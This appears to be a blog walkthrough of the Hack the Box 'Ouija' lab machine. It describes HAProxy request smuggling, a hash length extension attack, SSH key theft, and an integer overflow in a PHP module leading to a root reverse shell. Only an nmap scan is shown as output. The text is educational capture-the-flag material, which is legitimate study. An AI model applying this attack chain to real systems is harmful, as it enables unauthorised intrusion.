In this post, I would like to share a walkthrough of the Ouija Machine from Hack the Box

This room will be considered an Insane machine on Hack the Box

What will you gain from the Ouija machine?

For the user flag, you must abuse the smuggling vulnerability to enable access to a development site that HAProxy is intended to block. This access exposes information about the API, sufficient to perform a hash length extension attack to obtain a valid admin key for the API. With this key, I can exploit the API to read files from the system, including an SSH key, thereby gaining an initial foothold.

As for the root flag, you need to exploit a custom PHP module, written in C and compiled into a .so file containing an integer overflow vulnerability. This vulnerability allows for overwriting variables on the stack, enabling arbitrary write access as root on the system.

Information Gathering on Ouija Machine

Once we have started the VPN connection which requires a download from Hackthebox, we can start

┌─[darknite@parrot]─[~/Documents/htb/ouija]
└──╼ $nmap -sV -sC 10.10.11.244 -oA initial 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-17 21:44 EDT
Nmap scan report for 10.10.11.244
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 6ff2b4ed1a918d6ec9105171d57c49bb (ECDSA)
|_  256 dfddbcdc570d98af0f882f73334862e8 (ED25519)
80/tcp   open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.71 seconds
┌─[darknite@parrot]─[~/Documents/htb/ouija]
└──╼ $

Let’s access the website interface

It shows an Apache2 Default Page when trying to access the website

After I analysed the Nmap output, I noticed another port opened as 3000 which is configured with the Node.js Express framework

As a result, we will be enumerating further using gobuster due to the lack of information on the website interface itself.

There’s a server-status information showing the log for the Apache Server on the machine.

While looking at the server-status, the process status caught my attention which provides some potential directories that we can investigate later.

Access the website using the domain name

Let’s access the website using a domain name like ouija.htb which shows an actual interface for a Web Application.

At least, we have found the potential username when looking at the Team section

Let’s send one message and see the response to the packet

Sadly, nothing that looks interesting in the response

Let’s try to enumerate further on the website that opens port 3000 to the public but we found an error while doing it.

As a result, let’s insert the additional command as –wildcard switch at the end of the gobuster actual command.

There are a few endpoints that look interesting so let’s try it on the website.

When accessing the endpoint that caught my attention, it required a few data to enter.

Enumerate possible subdomains on the Ouija machine

However, there is no interest to investigate more

Let’s change the wordlist and find a lot more result

There is one subdomain that has caught my attention

We got an error 403 Forbidden when trying to access dev.ouija.htb

On the subdomain gitea.ouija.htb, we have directed you to a Gitea main page.

I noticed there’s one repository that we can look into which is Leila

There is no suspicious thing that appears on the repo

While scrolling below, I noticed there’s HA-Proxy version 2.2.16 which looks new to me.

For those who are not sure about the vulnerability with HA-Proxy version 2.2.16, I hope that the information below makes you understandable

Apache internally listens on port 8080, and the HAProxy reverse proxy version 2.2.16, sourced from the repository, has been identified as vulnerable to request smuggling (GHSA-h2p2-w857-329f / CVE-2023-25725).

It doesn’t work as shown above so let’s workaround with the vulnerabilities

By using that vulnerability that I found earlier, I have found two files that we can investigate further

Let’s analyze the source code which we can use to proceed with the next stage.

We can look into the self-environ which it expose the potential username (Leila)

Sadly, we cannot retrieve the /etc/passwd at the moment

After changing the content-length, it works like a charm!

Let’s do some research on the Hash Length Extension Attack which can be read here

Another resource that can be used here to escalate further

Let’s get some ihash and identification by using hash_extender which can be downloaded here

Let’s obtain the user’s SSH private key and we can copy-paste the key into our machine.

We also can obtain the user flag by doing the method above.

Finally, we have successfully the machine via Leila’s access

We can read the user flag by typing the “cat user.txt” command

Escalate to Root Privileges Access

As usual, we can try to obtain some binary but it failed because we need the password for the Leila

Let’s see the port that opens within the machine and notice that there’s one port that looks unusual

Therefore, let’s do Port-Forwarding on the machine

It looks like a normal login page

As a result, let’s enter common credentials such as admin:admin

Sadly, nothing looks interesting on the Response

There’s one directory that looks different than usual

After looking at the directory, I noticed there is one file that we need to investigate further

The screenshot above shows the source code of the index.php

There’s one file format that we should investigate deeper

Let’s download the file into our machine

We can download it using pwncat-cs

Let’s analyze the file using Ghidra

We should run the command above to escalate further

Let’s create buffer overflow command such as shown in the screenshot above

Therefore, let’s copy-paste the BoF file via Burpsuite

The command injection works like a charm

Finally, we managed to retrieve the reverse shell connection back to us

We can read the root flag by typing the “cat root.txt” command

Categories:

No responses yet

Leave a Reply

Your email address will not be published. Required fields are marked *